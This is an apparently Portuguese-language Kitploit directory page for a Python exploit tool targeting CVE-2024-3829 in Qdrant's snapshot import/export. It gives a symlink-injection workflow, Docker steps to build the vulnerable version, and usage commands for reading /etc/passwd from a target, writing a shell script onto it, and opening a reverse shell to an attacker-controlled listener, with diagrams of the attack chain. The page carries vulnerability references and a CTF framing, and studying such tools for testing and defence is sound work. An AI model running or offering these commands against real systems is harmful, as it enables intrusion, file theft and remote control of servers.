Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-3829 — Exploit em Python para o CVE-2024-3829 que visa a importação/exportação de snapshots do Qdrant, permitindo leitura de arquivos, escrita de arquivos e execução de shell reversa por meio de injeção de symlink. | Kitploit
Ferramentas/GitHubGitHub/fabse-hack/cve-2024-3829
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoDesenvolvimento de Payloads
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

Exploit em Python para o CVE-2024-3829 que visa a importação/exportação de snapshots do Qdrant, permitindo leitura de arquivos, escrita de arquivos e execução de shell reversa por meio de injeção de symlink.

Ver Repositório
12há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-3829 para Qdrant - Exploit

root@kitploit:~
 ########################### THIS IS AN EXPLOIT FOR CVE-2024-3829 IN QDRANT 1.9.0-dev ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### by fabse-hack.de ###############################################  

Este repositório documenta e demonstra CVE-2024-3829 para qdrant/qdrant (v1.9.0-dev)

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • Mais informações e ideia para este repositório:
  • Huntr: https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub: https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

Suporte e Doação

Paypal:

Compre-me um Café:

Visão Geral

A vulnerabilidade permite a manipulação de arquivos de snapshot através de truques de symlink/caminho. Isso possibilita duas classes de impacto e um reverse shell hahhaa:

  1. Leitura de arquivo
  2. Escrita de arquivo
  3. Executar reverse shell

Dependendo do ambiente, primitivas de escrita de arquivos podem escalar para execução de código.

Software Afetado (veja no link da NVD)

  • Produto: Qdrant
  • Versão: 1.9.0-dev
  • Componente: Importação/Exportação de Snapshots

Nota sobre o número da versão:

Esta versão não está mais disponível na world wide web (algumas pessoas chamam de "internet").
No repositório do qdrant, o relatório da NVD Nist apontou para o commit, que é o v1.9.0-dev vulnerável.
Se você quiser instalar esta versão para CTF / outras coisas em um docker, use:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

Fluxo de Trabalho (Simplificado)

  1. Criar uma coleção
  2. Gerar um snapshot
  3. Descompactar e modificar o snapshot localmente
  4. Injetar um symlink no arquivo alvo de leitura/escrita
  5. Carregar o snapshot modificado
  6. Acionar a recuperação do snapshot
  7. Avaliar o resultado ler conteúdo do arquivo / escrever arquivo / executar reverse shell

Conteúdo do Repositório

  • cve_2024_3829.py - Exploit para fluxo de leitura/escrita/acionamento
  • requirements.txt - Dependências Python

Requisitos

  • Sistema Kali Linux recomendado
  • Python 3.10+
  • Servidor Qdrant em execução para testes locais
  • Pacote Python requests

Instalação:

root@kitploit:~
python3 -m pip install -r requirements.txt

Uso

Mostrar todas as opções:

root@kitploit:~
python3 cve_2024_3829.py -h

Exemplos:

root@kitploit:~
# Modo leitura
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# Modo escrita
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# Modo reverse shell
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

Parâmetros Disponíveis

  • -h, --help: mostrar ajuda da CLI
  • -m, --mode: um de read, write, reverse_shell (obrigatório)
    parâmetros do alvo:
  • -tu, --target_url: URL base do Qdrant (padrão no script)
  • -tp, --target_port: porta do alvo Qdrant (padrão: 6333)
  • -tpath, --target_path: caminho remoto do alvo (padrão: /etc/)
  • -tf, --target_file_name: nome do arquivo remoto do alvo (padrão: passwd)
    parâmetros do atacante:
  • -ai, --attacker_ip: IP de callback/listener para modo reverse shell
  • -ap, --attacker_port: porta de callback/listener (padrão: 9001)
  • -apath, --attacker_path: caminho local do arquivo do atacante para modo write (padrão: /tmp/)
  • -af, --attacker_file_name: nome do arquivo usado no alvo no modo write (padrão: shell.sh)

Notas

  • --target_url deve ser a URL base sem a porta no final se você passar --target_port separadamente, porque o script constrói URLs como <url>:<target_port>/....
  • No modo read, o script combina --target_path e --target_file_name (por exemplo /etc/ + passwd).
  • No modo write, --attacker_path deve apontar para um arquivo local existente e --attacker_file_name define o nome do arquivo remoto.
  • Para testes de rede através de limites Docker/WSL/host, verifique a acessibilidade primeiro (por exemplo com netcat) antes de executar o modo de acionamento.
root@kitploit:~
sequenceDiagram
    participant Attacker
    participant Exploit
    participant Target
    participant Listener

    Attacker->>Exploit: Start exploit script
    Exploit->>Listener: Start TCP listener
    Exploit->>Target: Create malicious collection
    Exploit->>Target: Upload trigger script
    Exploit->>Target: Overwrite executable
    Exploit->>Target: Call /stacktrace endpoint
    Target->>Listener: Reverse shell connection
    Listener->>Attacker: Interactive shell access
root@kitploit:~
flowchart TD
    Start[Start Listener]
    Bind[Bind to attacker port]
    Listen[Wait for connection]
    Accept[Accept incoming connection]
    Interactive[Interactive shell session]
    End[Connection closed]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
Baixar ferramenta